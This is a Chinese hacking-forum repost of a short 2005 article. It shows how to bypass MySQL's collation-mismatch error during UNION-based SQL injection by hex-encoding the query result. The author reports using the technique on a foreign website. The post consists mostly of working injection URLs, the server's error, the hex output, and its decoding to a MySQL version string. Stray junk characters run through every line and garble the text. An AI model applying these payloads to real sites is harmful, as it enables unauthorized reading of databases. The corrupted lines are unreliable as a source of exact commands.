中国网络渗透测试联盟

标题: MySQL注射时ErrorNo.1267的突破 [打印本页]

作者: admin    时间: 2012-9-15 14:04
标题: MySQL注射时ErrorNo.1267的突破
本文作者:SuperHei
8 I# O9 G+ {& v; x( M  P; d. i文章性质:原创6 v) u3 H6 y! J1 d
发布日期:2005-10-18
% Y- a8 [* d8 K3 R* E; s5 z, B测试个国外的站时:3 K9 a. g% H- d- q( \
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*7 N+ q( t! g4 h* b& y6 |
返回错误:3 v3 T* Y# e) e  W. O
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'  p7 ]! T( A- S3 z# H* @7 M( k6 `
MySQL Error No. 126
6 N2 X7 H; }0 N% N" t& V看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。, \& a4 h8 Q+ R# E8 R: C5 l& o
解决办法:转为其他编码如hex。; D5 m! s* i' U9 t2 y% N" k
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
2 ^5 z* e! g6 L5 d3 a成功得到hex(version())的值为:
1 R+ S3 F. d/ p7 W342E312E332D62657461
* g! \$ ?% {  B# ^- S回Mysql查询下得到:; c; w( l# B# v& ?
mysql> select 0x342E312E332D62657461;
' w+ Z; K4 e) N% o  ~* v5 Q) w+------------------------+
7 u" F# v, `( x0 I4 c8 L4 r9 e1 g0 e) || 0x342E312E332D62657461 |) ]% j$ Z  }. M7 I" ^  M5 Y
+------------------------+
' J9 u7 I& b3 O) d" [/ m8 \' q| 4.1.3-beta |
- z: _$ m' m! Y4 X: V+ c1 f+------------------------+
: R) [' F$ Q. E# `, U+ O- z1 row in set (0.00 sec)
0 g. s6 R3 h; g$ ~1 ^( W2 ]3 \7 i* w  y; E





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2